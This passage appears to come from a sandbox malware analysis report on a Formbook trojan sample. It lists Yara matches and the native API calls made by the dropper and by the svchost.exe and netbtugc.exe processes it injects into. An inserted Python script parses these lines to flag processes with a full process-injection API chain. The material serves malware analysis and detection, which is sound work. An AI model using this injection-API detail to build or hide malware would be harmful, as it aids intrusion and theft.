            Source: Yara match; File source: 2.2.svchost.exe.380000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 2.2.svchost.exe.380000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000002.00000002.2584333644.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000006.00000002.3345963921.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000006.00000002.3347470009.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000006.00000002.3347537099.0000000003710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000002.00000002.2583640738.0000000000380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000005.00000002.3347630657.00000000035F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000007.00000002.3347309941.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000002.00000002.2584390096.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.svchost.exe.380000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 2.2.svchost.exe.380000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000002.00000002.2584333644.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000006.00000002.3345963921.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000006.00000002.3347470009.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000006.00000002.3347537099.0000000003710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000002.00000002.2583640738.0000000000380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000005.00000002.3347630657.00000000035F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000007.00000002.3347309941.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000002.00000002.2584390096.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_003AC4F3 NtClose, 2_2_003AC4F3
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B82B60 NtClose,LdrInitializeThunk, 2_2_00B82B60
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B82C70 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_00B82C70
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B82DF0 NtQuerySystemInformation,LdrInitializeThunk, 2_2_00B82DF0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B835C0 NtCreateMutant,LdrInitializeThunk, 2_2_00B835C0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B84340 NtSetContextThread, 2_2_00B84340
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B84650 NtSuspendThread, 2_2_00B84650
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B82AB0 NtWaitForSingleObject, 2_2_00B82AB0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B82AF0 NtWriteFile, 2_2_00B82AF0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B82AD0 NtReadFile, 2_2_00B82AD0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B82BA0 NtEnumerateValueKey, 2_2_00B82BA0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B82B80 NtQueryInformationFile, 2_2_00B82B80
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B82BF0 NtAllocateVirtualMemory, 2_2_00B82BF0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B82BE0 NtQueryValueKey, 2_2_00B82BE0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B82CA0 NtQueryInformationToken, 2_2_00B82CA0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B82CF0 NtOpenProcess, 2_2_00B82CF0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B82CC0 NtQueryVirtualMemory, 2_2_00B82CC0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B82C00 NtQueryInformationProcess, 2_2_00B82C00
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B82C60 NtCreateKey, 2_2_00B82C60
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B82DB0 NtEnumerateKey, 2_2_00B82DB0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B82DD0 NtDelayExecution, 2_2_00B82DD0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B82D30 NtUnmapViewOfSection, 2_2_00B82D30
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B82D10 NtMapViewOfSection, 2_2_00B82D10
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B82D00 NtSetInformationFile, 2_2_00B82D00
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B82EA0 NtAdjustPrivilegesToken, 2_2_00B82EA0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B82E80 NtReadVirtualMemory, 2_2_00B82E80
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B82EE0 NtQueueApcThread, 2_2_00B82EE0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B82E30 NtWriteVirtualMemory, 2_2_00B82E30
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B82FB0 NtResumeThread, 2_2_00B82FB0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B82FA0 NtQuerySection, 2_2_00B82FA0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B82F90 NtProtectVirtualMemory, 2_2_00B82F90
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B82FE0 NtCreateFile, 2_2_00B82FE0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B82F30 NtCreateSection, 2_2_00B82F30
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B82F60 NtCreateProcessEx, 2_2_00B82F60
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B83090 NtSetValueKey, 2_2_00B83090
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B83010 NtOpenDirectoryObject, 2_2_00B83010
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B839B0 NtGetContextThread, 2_2_00B839B0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B83D10 NtOpenProcessToken, 2_2_00B83D10
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B83D70 NtOpenThread, 2_2_00B83D70
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03974340 NtSetContextThread,LdrInitializeThunk, 6_2_03974340
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03974650 NtSuspendThread,LdrInitializeThunk, 6_2_03974650
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03972BA0 NtEnumerateValueKey,LdrInitializeThunk, 6_2_03972BA0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03972BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_03972BF0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03972BE0 NtQueryValueKey,LdrInitializeThunk, 6_2_03972BE0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03972B60 NtClose,LdrInitializeThunk, 6_2_03972B60
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03972AD0 NtReadFile,LdrInitializeThunk, 6_2_03972AD0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03972AF0 NtWriteFile,LdrInitializeThunk, 6_2_03972AF0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03972FB0 NtResumeThread,LdrInitializeThunk, 6_2_03972FB0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03972FE0 NtCreateFile,LdrInitializeThunk, 6_2_03972FE0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03972F30 NtCreateSection,LdrInitializeThunk, 6_2_03972F30
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03972E80 NtReadVirtualMemory,LdrInitializeThunk, 6_2_03972E80
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03972EE0 NtQueueApcThread,LdrInitializeThunk, 6_2_03972EE0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03972DD0 NtDelayExecution,LdrInitializeThunk, 6_2_03972DD0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03972DF0 NtQuerySystemInformation,LdrInitializeThunk, 6_2_03972DF0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03972D10 NtMapViewOfSection,LdrInitializeThunk, 6_2_03972D10
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03972D30 NtUnmapViewOfSection,LdrInitializeThunk, 6_2_03972D30
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03972CA0 NtQueryInformationToken,LdrInitializeThunk, 6_2_03972CA0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03972C70 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_03972C70
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03972C60 NtCreateKey,LdrInitializeThunk, 6_2_03972C60
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039735C0 NtCreateMutant,LdrInitializeThunk, 6_2_039735C0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_039739B0 NtGetContextThread,LdrInitializeThunk, 6_2_039739B0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03972B80 NtQueryInformationFile, 6_2_03972B80
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03972AB0 NtWaitForSingleObject, 6_2_03972AB0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03972F90 NtProtectVirtualMemory, 6_2_03972F90
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03972FA0 NtQuerySection, 6_2_03972FA0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03972F60 NtCreateProcessEx, 6_2_03972F60
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03972EA0 NtAdjustPrivilegesToken, 6_2_03972EA0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03972E30 NtWriteVirtualMemory, 6_2_03972E30
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03972DB0 NtEnumerateKey, 6_2_03972DB0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03972D00 NtSetInformationFile, 6_2_03972D00
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03972CC0 NtQueryVirtualMemory, 6_2_03972CC0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03972CF0 NtOpenProcess, 6_2_03972CF0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03972C00 NtQueryInformationProcess, 6_2_03972C00
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03973090 NtSetValueKey, 6_2_03973090
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03973010 NtOpenDirectoryObject, 6_2_03973010
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03973D10 NtOpenProcessToken, 6_2_03973D10
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03973D70 NtOpenThread, 6_2_03973D70
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03228B30 NtCreateFile, 6_2_03228B30
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03228FB0 NtAllocateVirtualMemory, 6_2_03228FB0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03228E40 NtClose, 6_2_03228E40
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03228D90 NtDeleteFile, 6_2_03228D90
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 6_2_03228CA0 NtReadFile, 6_2_03228CA0
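The native-function inventory above is a flat list per process; what a triage analyst actually wants from it is whether a single process carries every stage of a remote-injection chain (open a target, obtain memory in it, write a payload, run it). The following Python script is an added example, not part of the Joe Sandbox report or its tooling. It parses "Code function" lines in the format shown above (the repeated function id at the end of each line is used as the terminator, and it accepts both the raw extraction and a comma-separated cleanup of it), aggregates the API names per process, and reports which injection stages each process can perform. The sample lines are copied from this section; the stage table is my own grouping of well-known NTDLL primitives and is an assumption about what counts as each stage, not something the report states.

```python
import re
from collections import defaultdict

# Constructed input: a subset of the "Code function" lines from this report
# section (process index 2 = svchost.exe, 6 = netbtugc.exe, 0 = the dropper).
SAMPLE_LINES = r"""
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82CF0 NtOpenProcess,2_2_00B82CF0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82BF0 NtAllocateVirtualMemory,2_2_00B82BF0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82E30 NtWriteVirtualMemory,2_2_00B82E30
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82EE0 NtQueueApcThread,2_2_00B82EE0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B84340 NtSetContextThread,2_2_00B84340
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B82B60 NtClose,LdrInitializeThunk,2_2_00B82B60
Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03972D10 NtMapViewOfSection,LdrInitializeThunk,6_2_03972D10
Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03972E30 NtWriteVirtualMemory,6_2_03972E30
Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03972CF0 NtOpenProcess,6_2_03972CF0
Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03972EE0 NtQueueApcThread,LdrInitializeThunk,6_2_03972EE0
Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_000C702F: CreateFileW,DeviceIoControl,CloseHandle,0_2_000C702F
Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exeCode function: 0_2_00092B400_2_00092B40
"""

# One report line: "Source: <path>[,] Code function: <fid>[:] <api>,<api>,...[,] <fid>".
# The function id is repeated at the end of the line (it is a link in the HTML
# report), so the back-reference (?P=fid) anchors the end of the API list. The
# separators are optional so the raw extraction parses as well as a cleaned copy.
LINE_RE = re.compile(
    r"Source:\s*(?P<src>.+?),?\s*Code function:\s*"
    r"(?P<fid>\d+_\d+_[0-9A-Fa-f]+):?\s*"
    r"(?P<apis>.*?),?\s*(?P=fid)\s*$"
)

# Assumed grouping of NTDLL primitives into the stages of a remote-injection
# chain. This table is the example's own, not the report's; a process is
# considered injection-capable when every stage has at least one primitive.
INJECTION_STAGES = {
    "open target":   {"NtOpenProcess", "NtCreateProcessEx"},
    "obtain memory": {"NtAllocateVirtualMemory", "NtCreateSection", "NtMapViewOfSection"},
    "write payload": {"NtWriteVirtualMemory", "NtMapViewOfSection"},
    "run payload":   {"NtQueueApcThread", "NtSetContextThread", "NtResumeThread", "NtCreateThreadEx"},
}


def parse_line(line):
    """Return (process basename, function id, [api names]) or None if not a Code function line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    proc = m.group("src").replace("/", "\\").rsplit("\\", 1)[-1]
    apis = [a.strip() for a in m.group("apis").split(",") if a.strip()]
    return proc, m.group("fid"), apis


def injection_stages(apis):
    """Map each stage to the sorted list of APIs from `apis` that satisfy it."""
    return {stage: sorted(apis & names) for stage, names in INJECTION_STAGES.items()}


def injection_capable(apis):
    """True when every stage of the chain has at least one primitive present."""
    return all(apis & names for names in INJECTION_STAGES.values())


def analyze(text):
    """Aggregate report lines into per-process API sets plus an injection verdict."""
    per_proc = defaultdict(set)
    for line in text.splitlines():
        parsed = parse_line(line)
        if parsed:
            proc, _fid, apis = parsed
            per_proc[proc].update(apis)
    return {
        proc: {
            "apis": apis,
            "stages": injection_stages(apis),
            "injection_capable": injection_capable(apis),
        }
        for proc, apis in per_proc.items()
    }


if __name__ == "__main__":
    for proc, info in analyze(SAMPLE_LINES).items():
        verdict = "INJECTION-CAPABLE" if info["injection_capable"] else "no full chain"
        print(f"{proc}: {verdict}")
        for stage, hits in info["stages"].items():
            print(f"  {stage:14s} {', '.join(hits) or '-'}")
```

Run against the full section rather than the sample, the parser gives the same verdict: both svchost.exe (index 2) and netbtugc.exe (index 6) carry the complete chain, while the dropper's listed functions do not. Note also that the stub offsets in the two child processes differ only in their base (0x00B82xxx versus 0x03972xxx, same low 16 bits), which is what one expects when the same injected code is mapped at a different address in each host.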
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, Code function: 0_2_000C702F: CreateFileW,DeviceIoControl,CloseHandle, 0_2_000C702F
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, Code function: 0_2_000BB9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_000BB9F1
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, Code function: 0_2_000C82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 0_2_000C82D0
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, Code function: 0_2_00092B40, 0_2_00092B40
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, Code function: 0_2_00093680, 0_2_00093680
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, Code function: 0_2_000ABDF6, 0_2_000ABDF6
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, Code function: 0_2_0008A0C0, 0_2_0008A0C0
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, Code function: 0_2_000A0183, 0_2_000A0183
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, Code function: 0_2_000C220C, 0_2_000C220C
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, Code function: 0_2_00088530, 0_2_00088530
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, Code function: 0_2_00086670, 0_2_00086670
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, Code function: 0_2_000A0677, 0_2_000A0677
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, Code function: 0_2_000B8779, 0_2_000B8779
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, Code function: 0_2_000EA8DC, 0_2_000EA8DC
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, Code function: 0_2_000A0A8F, 0_2_000A0A8F
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, Code function: 0_2_00086BBC, 0_2_00086BBC
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, Code function: 0_2_000AAC83, 0_2_000AAC83
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, Code function: 0_2_00088CA0, 0_2_00088CA0
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, Code function: 0_2_0009AD5C, 0_2_0009AD5C
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, Code function: 0_2_000B4EBF, 0_2_000B4EBF
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, Code function: 0_2_000A0EC4, 0_2_000A0EC4
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, Code function: 0_2_000E30AD, 0_2_000E30AD
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, Code function: 0_2_000B113E, 0_2_000B113E
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, Code function: 0_2_000A12F9, 0_2_000A12F9
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, Code function: 0_2_000B542F, 0_2_000B542F
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, Code function: 0_2_000EF5D0, 0_2_000EF5D0
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, Code function: 0_2_000B599F, 0_2_000B599F
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, Code function: 0_2_000ADA74, 0_2_000ADA74
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, Code function: 0_2_0008DCD0, 0_2_0008DCD0
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, Code function: 0_2_00085D32, 0_2_00085D32
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, Code function: 0_2_0008BDF0, 0_2_0008BDF0
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, Code function: 0_2_000A1E5A, 0_2_000A1E5A
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, Code function: 0_2_000ADF69, 0_2_000ADF69
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, Code function: 0_2_000CBFB8, 0_2_000CBFB8
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, Code function: 0_2_000B7FFD, 0_2_000B7FFD
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, Code function: 0_2_00A4F2F3, 0_2_00A4F2F3
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, Code function: 0_2_00A52FD8, 0_2_00A52FD8
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00398573, 2_2_00398573
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00390033, 2_2_00390033
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0038E0B3, 2_2_0038E0B3
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_003830A0, 2_2_003830A0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00383097, 2_2_00383097
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00382A30, 2_2_00382A30
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_003AEAD3, 2_2_003AEAD3
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00383430, 2_2_00383430
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_003824D0, 2_2_003824D0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0038FE13, 2_2_0038FE13
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_003826A0, 2_2_003826A0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00396753, 2_2_00396753
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0039674E, 2_2_0039674E
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00BE2000, 2_2_00BE2000
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00C081CC, 2_2_00C081CC
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00C041A2, 2_2_00C041A2
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00C101AA, 2_2_00C101AA
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00BEA118, 2_2_00BEA118
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B40100, 2_2_00B40100
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00BD8158, 2_2_00BD8158
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00BD02C0, 2_2_00BD02C0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00BF0274, 2_2_00BF0274
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00C103E6, 2_2_00C103E6
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B5E3F0, 2_2_00B5E3F0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00C0A352, 2_2_00C0A352
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00BFE4F6, 2_2_00BFE4F6
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00C02446, 2_2_00C02446
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00BF4420, 2_2_00BF4420
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00C10591, 2_2_00C10591
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B50535, 2_2_00B50535
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B6C6E0, 2_2_00B6C6E0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B4C7C0, 2_2_00B4C7C0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B50770, 2_2_00B50770
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B74750, 2_2_00B74750
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B368B8, 2_2_00B368B8
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B7E8F0, 2_2_00B7E8F0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B52840, 2_2_00B52840
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B5A840, 2_2_00B5A840
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B529A0, 2_2_00B529A0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00C1A9A6, 2_2_00C1A9A6
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B66962, 2_2_00B66962
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B4EA80, 2_2_00B4EA80
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00C06BD7, 2_2_00C06BD7
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00C0AB40, 2_2_00C0AB40
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00BF0CB5, 2_2_00BF0CB5
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B40CF2, 2_2_00B40CF2
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B50C00, 2_2_00B50C00
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B68DBF, 2_2_00B68DBF
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B4ADE0, 2_2_00B4ADE0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00BECD1F, 2_2_00BECD1F
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B5AD00, 2_2_00B5AD00
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00C0EEDB, 2_2_00C0EEDB
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B62E90, 2_2_00B62E90
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00C0CE93, 2_2_00C0CE93
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00C0EE26, 2_2_00C0EE26
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B50E59, 2_2_00B50E59
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00BCEFA0, 2_2_00BCEFA0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B5CFE0, 2_2_00B5CFE0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B42FC8, 2_2_00B42FC8
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B70F30, 2_2_00B70F30
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00BF2F30, 2_2_00BF2F30
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00B92F28, 2_2_00B92F28
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00BC4F40, 2_2_00BC4F40
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_00C0F0E0, 2_2_00C0F0E0
